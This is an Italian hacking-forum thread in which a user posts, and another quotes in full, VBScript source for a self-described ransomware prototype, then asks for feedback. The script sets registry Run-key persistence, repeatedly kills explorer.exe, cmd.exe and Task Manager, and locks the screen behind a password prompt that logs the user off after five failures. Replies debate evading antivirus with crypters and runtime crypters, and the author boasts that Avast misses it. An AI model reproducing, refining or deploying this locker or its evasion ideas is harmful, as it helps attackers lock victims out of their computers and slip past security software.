Discussione Malware prototipo di ransomware

[sn1tch]

salve popolo di inforge
ho deciso di pubblicare qui il codice sorgente di una specie di ransomware scritto da me (VBS)


Set shell=CreateObject("WScript.Shell")
Set speake=CreateObject("SAPI.spvoice")
Set fso=CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MOM",WScript.ScriptFullName,"REG_SZ"
path1=WScript.ScriptFullName
path2=WScript.ScriptName
path=Replace(path1,path2,"")
shell.run path+"2.vbs"
stupid=Null
WScript.Sleep 500
ch=5
Set file2=fspenTextFile(path&"POOP.txt",2)
file2.WriteLine("")
file2.Close
Do
user=InputBox("skynet ha preso possesso del tuo pc. se vuoi riaverlo, inserici la password qui : "&vbNewLine&stupid,"tentativi rimasti : "&ch)
If user<>"CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@" Then
ch=ch-1
If ch=0 Then
Set file2=fspenTextFile(path&"POOP.txt",2)
file2.WriteLine("")
file2.Close
shell.Run "shutdown.exe /l"
End If
stupid="PASSWORD ERRATA"
End If
Loop Until user="CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@" 'CHANGE THE PASSWORD
Set file1=fspenTextFile(path&"POOP.txt",2)
file1.WriteLine("OK")
file1.Close
speake.speak "bentornato!"
WScript.Sleep 3000


On Error Resume Next
Set shell=CreateObject("WScript.Shell")
Set fso=CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MOM2",WScript.ScriptFullName,"REG_SZ"
path1=WScript.ScriptFullName
path2=WScript.ScriptName
path=Replace(path1,path2,"")
Do
shell.Run "taskkill /F /IM explorer.exe",0
shell.Run "taskkill /F /IM cmd.exe",0
shell.Run "taskkill /F /IM Taskmgr.exe",0
WScript.Sleep 1000
If fso.FileExists(path&"POOP.txt") then
Set check=fspenTextFile(path&"POOP.txt",1)
line=check.ReadLine
check.Close
If line="OK" Then
Set check1=fspenTextFile(path&"POOP.txt",2)
line=check.WriteLine(Null)
check1.Close
shell.Run "explorer.exe"
WScript.Quit
end if
End If
Loop


che ne pensate?

 

[Utente cancellato 263979]

salve popolo di inforge
ho deciso di pubblicare qui il codice sorgente di una specie di ransomware scritto da me (VBS)


Set shell=CreateObject("WScript.Shell")
Set speake=CreateObject("SAPI.spvoice")
Set fso=CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MOM",WScript.ScriptFullName,"REG_SZ"
path1=WScript.ScriptFullName
path2=WScript.ScriptName
path=Replace(path1,path2,"")
shell.run path+"2.vbs"
stupid=Null
WScript.Sleep 500
ch=5
Set file2=fspenTextFile(path&"POOP.txt",2)
file2.WriteLine("")
file2.Close
Do
user=InputBox("skynet ha preso possesso del tuo pc. se vuoi riaverlo, inserici la password qui : "&vbNewLine&stupid,"tentativi rimasti : "&ch)
If user<>"CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@" Then
ch=ch-1
If ch=0 Then
Set file2=fspenTextFile(path&"POOP.txt",2)
file2.WriteLine("")
file2.Close
shell.Run "shutdown.exe /l"
End If
stupid="PASSWORD ERRATA"
End If
Loop Until user="CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@" 'CHANGE THE PASSWORD
Set file1=fspenTextFile(path&"POOP.txt",2)
file1.WriteLine("OK")
file1.Close
speake.speak "bentornato!"
WScript.Sleep 3000


On Error Resume Next
Set shell=CreateObject("WScript.Shell")
Set fso=CreateObject("Scripting.FileSystemObject")
shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MOM2",WScript.ScriptFullName,"REG_SZ"
path1=WScript.ScriptFullName
path2=WScript.ScriptName
path=Replace(path1,path2,"")
Do
shell.Run "taskkill /F /IM explorer.exe",0
shell.Run "taskkill /F /IM cmd.exe",0
shell.Run "taskkill /F /IM Taskmgr.exe",0
WScript.Sleep 1000
If fso.FileExists(path&"POOP.txt") then
Set check=fspenTextFile(path&"POOP.txt",1)
line=check.ReadLine
check.Close
If line="OK" Then
Set check1=fspenTextFile(path&"POOP.txt",2)
line=check.WriteLine(Null)
check1.Close
shell.Run "explorer.exe"
WScript.Quit
end if
End If
Loop


che ne pensate?

Mettilo tra i tag per il codice o copialo su pastebin, cosi non si capisce molto

 

[sn1tch]

Messaggio unito automaticamente: 26 Dicembre 2019

Mettilo tra i tag per il codice o copialo su pastebin, cosi non si capisce molto

cosa non capisci di preciso? le parti sostituite dalle emoji?

Messaggio unito automaticamente: 26 Dicembre 2019

ok signori, se non capite bene il codice, ecco il pastebin:

 

[Utente cancellato 263979]

Messaggio unito automaticamente: 26 Dicembre 2019

cosa non capisci di preciso? le parti sostituite dalle emoji?

Messaggio unito automaticamente: 26 Dicembre 2019

ok signori, se non capite bene il codice, ecco il pastebin:

No tranquillo rileggendolo non serviva

 

[sn1tch]

No tranquillo rileggendolo non serviva

che ne pensi?

 

[Utente cancellato 263979]

che ne pensi?

Ti dico appena lo provo e lo studio, se vuoi posso consigliarti delle modifiche

 

[sn1tch]

Ti dico appena lo provo e lo studio, se vuoi posso consigliarti delle modifiche

è proprio quello il mio obbiettivo, migliorare. grazie mille per il tempo che gli dedicherai

 

[Rossi12320]

Qualsiasi engine di un antivirus te lo blocca. Tralasciando ciò, perché non metti il codice in una repository su GitHub come fanno le persone normali?

 

[sn1tch]

Qualsiasi engine di un antivirus te lo blocca

mai sentito parlare di crypter?

Messaggio unito automaticamente: 5 Gennaio 2020

Tralasciando ciò, perché non metti il codice in una repository su GitHub come fanno le persone normali?

forse perchè è un progetto che voglio portare avanti da solo e qui ho chiesto solo dei consigli, come dovrebbero fare "le persone normali"

 

[Rossi12320]

mai sentito parlare di crypter?

Lol si vede che sei nuovo nel settore, purtroppo non basta un crypter(aka packer) , magari superi l’euristica e ottieni qualcosa di fud, ma L’engine di quasi tutti gli Av te lo rilevano.

 

[sn1tch]

purtroppo non basta un crypter(aka packer) , magari superi l’euristica e ottieni qualcosa di fud, ma L’engine di quasi tutti gli Av te lo rilevano.

mai sentito parlare di runtime crypters?

 

[Rossi12320]

mai sentito parlare di runtime crypters?

Un runtime crypter è un crypter normalissimo.
Metti una sezione di codice che viene virtualizzata ed eseguita successivamente, oppure injectata in qualche altro processo. Insomma funzionano così i crypter

E un ransomware crypted in questo modo viene bloccato

 

[sn1tch]

Insomma funzionano così i crypter

non credo proprio: un runtime crypter codifica lo stub sia dalla parte del codice sia in memoria, rendendo impossibile all'antivirus leggere il malware sia prima sia dopo l'esecuzione

 

[Rossi12320]

non credo proprio: un runtime crypter codifica lo stub sia dalla parte del codice sia in memoria, rendendo impossibile all'antivirus leggere il malware sia prima sia dopo l'esecuzione

Il codice in memoria viene decriptato per essere eseguito
E gli av come ti ho detto non rilevano i ransmware dal codice del programma stesso, ma gli engine ultimamente verificano gli effetti, oltre ad avere altre flag, come uso disco, ram e cpu

 

[Deus Ex Machina]

mai sentito parlare di runtime crypters?

Nah c'è l'analisi euristica che studia il comportamento del malware in una sandbox. Mi dispiace deluderti ma i crypters sotto questo aspetto non servono a niente

 

[sn1tch]

Nah c'è l'analisi euristica che studia il comportamento del malware in una sandbox. Mi dispiace deluderti ma i crypters sotto questo aspetto non servono a niente

in realtà non viene rilevato dato che non fa danni, spiegato in parole semplici, mette una specie di blocco schermo che non ti permette di fare nulla, non cripta i file.
ho testato giusto qualche minuto fa e va tutto alla grande, il buon vecchio avast dice che è tutto a posto

 

[vladthechad]

Troppo semplice, l'unico modo per farlo funzionare è facendo disabilitare all'utente l'antivirus

 

[sn1tch]

Troppo semplice, l'unico modo per farlo funzionare è facendo disabilitare all'utente l'antivirus

leggi il messaggio sopra

 

[Rossi12320]

in realtà non viene rilevato dato che non fa danni, spiegato in parole semplici, mette una specie di blocco schermo che non ti permette di fare nulla, non cripta i file.
ho testato giusto qualche minuto fa e va tutto alla grande, il buon vecchio avast dice che è tutto a posto

E lo chiami ransomware?

 

[sn1tch]

E lo chiami ransomware?

ti correggo: prototipo* di ransomware

 

[DidyMond]

in realtà non viene rilevato dato che non fa danni, spiegato in parole semplici, mette una specie di blocco schermo che non ti permette di fare nulla, non cripta i file.
ho testato giusto qualche minuto fa e va tutto alla grande, il buon vecchio avast dice che è tutto a posto

Scusa, ma dando una lettura veloce al codice mi sembra di capire che non fa proprio nulla di così dannoso...
Il tuo codice non fa altro che chiedere all'utente di inserire una stringa in input (CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@) e, se è sbagliata per 5 tentativi killa 3 processi (explorer.exe, cmd.exe, Taskmgr.exe). Direi che qualsiasi antivirus non rileverà questo codice come "dannoso" perchè di dannoso non ha proprio nulla.

 

[sn1tch]

Scusa, ma dando una lettura veloce al codice mi sembra di capire che non fa proprio nulla di così dannoso...
Il tuo codice non fa altro che chiedere all'utente di inserire una stringa in input (CEnQzMjW5x2Ih79P0YdoabTsyrHMbYhzTeJE8ibR47FO2Hy5mQEza2AP30UY@@@) e, se è sbagliata per 5 tentativi killa 3 processi (explorer.exe, cmd.exe, Taskmgr.exe). Direi che qualsiasi antivirus non rileverà questo codice come "dannoso" perchè di dannoso non ha proprio nulla.

no, mette una specie di blocco, non puoi fare nulla nulla nulla...

 

[DidyMond]

no, mette una specie di blocco, non puoi fare nulla nulla nulla...

Questo script, un antivirus, te lo farà eseguire sempre in quanto sono tutti comandi innocui...

 

[sn1tch]

Questo script, un antivirus, te lo farà eseguire sempre in quanto sono tutti comandi innocui...

certo, ma non credo siano molto innocue le conseguenze. scriviti la pass da qualche parte e testalo personalmente sul tuo pc se non ci credi

 

[hck2009]

ti correggo: prototipo* di ransomware

I ransomware volendo inserire questo blocco... dopo non potrebbero chiedere il riscatto, anche perché dopo l’utente non riesce più ad accedere sul desktop per leggere il readme per poter ottenere i file.... a meno che non lo stampino alla richiesta della password... una cosa inutile sinceramente... sembra che sia stato creato più da un lamerino.